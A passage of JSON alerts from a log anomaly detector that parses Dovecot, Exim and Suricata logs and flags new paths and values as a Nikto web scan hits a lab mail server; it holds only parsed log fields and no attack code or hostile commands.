lip=192.168.10.154, session=", "/parser/model/service/dovecot/dovecot_str": " dovecot: ", "/parser/model/service/dovecot/imap/imap_login": "imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/imap_login_str": "imap-login: ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str": "Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/disconnected_str": "Disconnected ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/auth/no_auth_str": "(no auth attempts in ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/duration": 0, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/secs_str": " secs): ", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info": "user=<>, rip=192.168.10.238, lip=192.168.10.154, session=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user_str": "user=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/user": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method_str": ">", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/method": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip_str": ", rip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/rip": 3232238318, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip_str": ", lip=", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/lip": 3232238234, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/mpid": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/secured": null, "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session_str": ", session=<", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/session": "B4nCRQygltnAqAru", "/parser/model/service/dovecot/imap/imap_login/login/disconnected_str/user_info/bracket_str": ">" } }, "LogData": { "RawLogData": [ "Mar 4 19:17:33 mail dovecot: imap-login: Disconnected (no auth attempts in 0 secs): user=<>, rip=192.168.10.238, lip=192.168.10.154, session=" ], "Timestamps": [ 1583349453 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 1, "AnalysisComponentType": "NewMatchPathDetector", "AnalysisComponentName": "Path Detector", "Message": "New path(es) detected", "PersistenceFileName": "Default", "AffectedLogAtomPaths": [ "/parser/model/fm/no_host_found", "/parser/model/fm/no_host_found/no_host_found_str", "/parser/model/fm/no_host_found/ip" ], "ParsedLogAtom": { "/parser/model": "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238", "/parser/model/time": 1583349454, "/parser/model/sp": " ", "/parser/model/fm/no_host_found": "no host name found for IP address 192.168.10.238", "/parser/model/fm/no_host_found/no_host_found_str": "no host name found for IP address ", "/parser/model/fm/no_host_found/ip": 3232238318 } }, "LogData": { "RawLogData": [ "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" ], "Timestamps": [ 1583349454 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 5, "AnalysisComponentType": "NewMatchPathValueDetector", "AnalysisComponentName": "Exim no host name found ip", "Message": "New value(s) detected", "PersistenceFileName": "exim_no_host_name_found_ip", "AffectedLogAtomPaths": [ "/parser/model/fm/no_host_found/ip" ], "AffectedLogAtomValues": [ 3232238318 ], "ParsedLogAtom": { "/parser/model": "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238", "/parser/model/time": 1583349454, "/parser/model/sp": " ", "/parser/model/fm/no_host_found": "no host name found for IP address 192.168.10.238", "/parser/model/fm/no_host_found/no_host_found_str": "no host name found for IP address ", "/parser/model/fm/no_host_found/ip": 3232238318 } }, "LogData": { "RawLogData": [ "2020-03-04 19:17:34 no host name found for IP address 192.168.10.238" ], "Timestamps": [ 1583349454 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:33.887668 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46762 -> 192.168.10.154:80", "/parser/model/time": 1583349513.887668, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46762, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:33.887668 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46762 -> 192.168.10.154:80" ], "Timestamps": [ 1583349513.89 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.132320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46764 -> 192.168.10.154:80", "/parser/model/time": 1583349514.13232, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46764, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.132320 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46764 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.132560+0000\",\"flow_id\":2024454293684286,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.13256, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2024454293684286,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46764, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2024454293684286,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2024454293684286, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.132560+0000\",\"flow_id\":2024454293684286,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46764,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:getinfo)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.134229 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46766 -> 192.168.10.154:80", "/parser/model/time": 1583349514.134229, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46766, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.134229 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46766 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.134416+0000\",\"flow_id\":1832280276994169,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.134416, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1832280276994169,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46766, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1832280276994169,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1832280276994169, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.134416+0000\",\"flow_id\":1832280276994169,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46766,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.13 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.138294 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46768 -> 192.168.10.154:80", "/parser/model/time": 1583349514.138294, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46768, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.138294 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46768 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.14 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.TPF", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.138485+0000\",\"flow_id\":1112705751193243,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46768,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.TPF\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.TPF\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.138485, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1112705751193243,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 